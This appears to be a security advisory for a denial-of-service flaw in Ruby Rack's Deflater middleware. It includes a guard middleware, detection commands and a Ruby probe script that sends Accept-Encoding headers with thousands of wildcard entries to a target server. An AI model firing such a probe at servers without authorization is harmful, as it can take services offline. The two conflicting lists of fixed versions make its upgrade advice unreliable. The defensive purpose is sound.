Platform: ruby
Component: rack
Fixed in: 2.2.24, 3.0.1, 3.2.1, 2.2.23
CVE-2026-34230 describes a denial-of-service (DoS) vulnerability in the Ruby Rack library, specifically in the Rack::Deflater middleware. The flaw is inefficient processing of the Accept-Encoding request header: when the header contains wildcard entries, the work done to select an encoding grows quadratically with the number of entries. Applications that use Rack::Deflater are susceptible, and upgrading to one of the fixed releases listed above resolves the issue.
An attacker can exploit this with a single HTTP request whose Accept-Encoding header contains a large number of wildcard (`*`) entries. `Rack::Utils.select_best_encoding`, which Rack::Deflater calls to choose the response encoding, expands each wildcard against the list of available encodings, and the cost of that expansion grows with the square of the number of entries, so a header of a few thousand bytes is enough to consume a disproportionate amount of CPU. Because each such request occupies a server process or thread for the duration, a modest stream of them can overwhelm the server and prevent legitimate users from reaching the application. The impact is greatest for applications that handle high request volumes or run on resource-constrained hosts.
CVE-2026-34230 was publicly disclosed on April 2, 2026. There is no indication of active exploitation at this time, and the vulnerability is not currently listed in the CISA KEV catalog. Public proof-of-concept (PoC) code is not widely available, but the vulnerability is straightforward to reproduce: the only input needed is a long Accept-Encoding header.
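As an added example (not Rack's own code and not part of this advisory), the following Rack-compatible middleware caps the number of Accept-Encoding entries and `*` tokens before a request reaches Rack::Deflater, which is the "filter or limit wildcard entries" stopgap in the mitigation section below. The class name, the limits and the two sample request environments are assumptions chosen for illustration; the code uses only the Ruby standard library, so it runs without the rack gem installed.

```ruby
# Added example: a guard placed in front of Rack::Deflater. It parses the
# Accept-Encoding header the way a client writes it (comma-separated codings,
# optional ";q=" parameters) and refuses requests whose entry or wildcard count
# is implausible for a real browser. Names and limits are assumptions for
# illustration, not part of Rack.
class AcceptEncodingGuard
  MAX_ENTRIES   = 16  # real clients send a handful of codings at most
  MAX_WILDCARDS = 1   # a legitimate client never needs more than one "*"

  def initialize(app, max_entries: MAX_ENTRIES, max_wildcards: MAX_WILDCARDS)
    @app = app
    @max_entries = max_entries
    @max_wildcards = max_wildcards
  end

  # Count codings and "*" tokens in a single pass, linear in the header length,
  # so the guard itself cannot be turned into the same kind of CPU sink.
  def self.inspect_header(value)
    codings = value.to_s.split(",").map { |entry| entry.split(";", 2).first.to_s.strip }
    codings.reject!(&:empty?)
    { entries: codings.size, wildcards: codings.count("*") }
  end

  def call(env)
    stats = self.class.inspect_header(env["HTTP_ACCEPT_ENCODING"])
    if stats[:entries] > @max_entries || stats[:wildcards] > @max_wildcards
      # Reject before Deflater runs. An alternative that keeps the request
      # alive is env.delete("HTTP_ACCEPT_ENCODING"), which makes Deflater fall
      # back to an uncompressed (identity) response.
      return [400, { "content-type" => "text/plain" }, ["unacceptable Accept-Encoding header\n"]]
    end
    @app.call(env)
  end
end

# Constructed sample requests (not captured traffic): a normal browser header
# and a hostile one carrying 4000 wildcard entries in just under 8 KiB.
BENIGN_ENV  = { "HTTP_ACCEPT_ENCODING" => "gzip, deflate, br;q=0.8, *;q=0.1" }
HOSTILE_ENV = { "HTTP_ACCEPT_ENCODING" => Array.new(4000, "*").join(",") }

# Stand-in for the rest of the stack (Rack::Deflater plus the application).
INNER_APP   = ->(_env) { [200, { "content-type" => "text/plain" }, ["ok\n"]] }
GUARDED_APP = AcceptEncodingGuard.new(INNER_APP)

def status_for(env)
  GUARDED_APP.call(env).first
end

if $PROGRAM_NAME == __FILE__
  puts "benign request  -> #{status_for(BENIGN_ENV)}"   # 200
  puts "hostile request -> #{status_for(HOSTILE_ENV)}"  # 400
end
```

In config.ru the guard has to be declared before the compressor (`use AcceptEncodingGuard` ahead of `use Rack::Deflater`) so that it runs first. It is a stopgap only: it keeps hostile input away from the quadratic path rather than removing that path, so the upgrade remains the fix.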
Ruby applications that rely on the Rack library and utilize the Rack::Deflater middleware are at risk. This includes web applications built with frameworks like Ruby on Rails, Sinatra, and Padrino. Shared hosting environments where Rack is a dependency are also potentially vulnerable.
Detection checks
• ruby / server: ps aux | grep rack
• ruby / server: journalctl -u rack | grep "select_best_encoding"
• generic web: curl -sI <target_url> | grep -i 'vary:.*accept-encoding'
  (Rack::Deflater adds a Vary: Accept-Encoding header to responses it may compress, so that response header is the signal that the middleware is in the stack; the request header Accept-Encoding itself never appears in a response.)
Disclosure
Exploit status: no active exploitation reported
EPSS: 0.05% (16th percentile)
CISA SSVC: not listed on this page
CVSS vector: not listed on this page
The primary mitigation for CVE-2026-34230 is to upgrade Rack to one of the fixed releases listed above. If an immediate upgrade is not feasible because of compatibility concerns or breaking changes, three stopgaps are available: cap or strip the Accept-Encoding header at the reverse proxy, or in a middleware placed ahead of Rack::Deflater, rejecting requests with more than a handful of entries or more than one `*`; configure the Web Application Firewall (WAF) to block requests with excessively long or complex Accept-Encoding headers; or remove Rack::Deflater from the middleware stack and let the reverse proxy handle compression, since only applications that use Rack::Deflater are exposed. After upgrading, confirm the fix by sending requests whose Accept-Encoding header carries an increasing number of wildcards and verifying that CPU usage and response time stay flat rather than growing with the entry count.
Update the Rack gem to version 2.2.23, 3.1.21 or 3.2.6, or later. This fixes the denial-of-service vulnerability caused by quadratic complexity in Accept-Encoding header processing. For an application managed by Bundler, run `bundle update rack --conservative` and commit the updated Gemfile.lock; `gem update rack` only changes the globally installed gem and does not affect an application pinned by Gemfile.lock.
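The post-upgrade check described above, written out as an added example that is not part of this advisory or of Rack: a probe that sends the crafted header with a doubling number of `*` entries and estimates how response time grows with that count. The target URL, the entry counts and the 1.6 exponent threshold are assumptions; run it only against a server you are authorized to test.

```ruby
require "net/http"
require "uri"

# Added example, not Rack's code. Builds the crafted header described above:
# n wildcard entries, comma-separated without spaces so that a few thousand
# entries still fit inside a typical 8 KiB request-header limit.
def wildcard_header(n)
  Array.new(n, "*").join(",")
end

# Send one GET carrying the crafted header and return wall-clock seconds.
# Latency is a proxy for the CPU the advisory talks about; watch the server's
# CPU counters alongside for a direct reading.
def time_request(uri, n)
  request = Net::HTTP::Get.new(uri)
  request["Accept-Encoding"] = wildcard_header(n)
  started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == "https",
                  read_timeout: 120) { |http| http.request(request) }
  Process.clock_gettime(Process::CLOCK_MONOTONIC) - started
end

# Fit the exponent k in time ~ n^k from successive (n, seconds) pairs.
# Linear work gives k near 1, quadratic work k near 2. Network and framework
# overhead pull the estimate down, so 1.6 is used as the alarm line.
def growth_exponent(timings)
  exponents = timings.each_cons(2).map do |(n1, t1), (n2, t2)|
    Math.log(t2 / t1) / Math.log(n2.to_f / n1)
  end
  exponents.sum / exponents.size
end

def looks_quadratic?(timings, threshold: 1.6)
  growth_exponent(timings) > threshold
end

# Usage: ruby probe.rb http://127.0.0.1:9292/   (assumed local test server)
if $PROGRAM_NAME == __FILE__ && ARGV[0]
  uri = URI(ARGV[0])
  timings = [500, 1000, 2000, 4000].map { |n| [n, time_request(uri, n)] }
  timings.each { |n, t| puts format("%5d wildcards: %.4f s", n, t) }
  puts(looks_quadratic?(timings) ? "growth looks quadratic: still vulnerable" : "growth looks linear: fix present")
end
```

Point the probe at a path that returns an ordinary compressible body (HTML or JSON without a Content-Encoding already set), because Rack::Deflater skips responses it would not compress and the encoding selection is never reached for them. A single measurement is not enough; the point of the doubling series is that a quadratic path roughly quadruples the time at each step while a fixed one stays flat.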
CVE-2026-34230 is a denial-of-service vulnerability in the Ruby Rack library's Deflater middleware. A crafted Accept-Encoding header can cause excessive CPU usage, potentially leading to a server outage.
You are affected if your Ruby application runs a Rack version older than the fixed releases listed above and includes Rack::Deflater in its middleware stack, whether directly or through a framework that enables it.
Upgrade Rack to one of the fixed releases listed above. If an immediate upgrade is not possible, cap or strip the Accept-Encoding header at the proxy or in a middleware placed ahead of Rack::Deflater, or remove Rack::Deflater and compress at the proxy instead.
There is currently no evidence of active exploitation of CVE-2026-34230, but the vulnerability's nature makes it relatively easy to reproduce.
Refer to the official Ruby security advisories and the Rack project's release notes for detailed information and updates regarding CVE-2026-34230.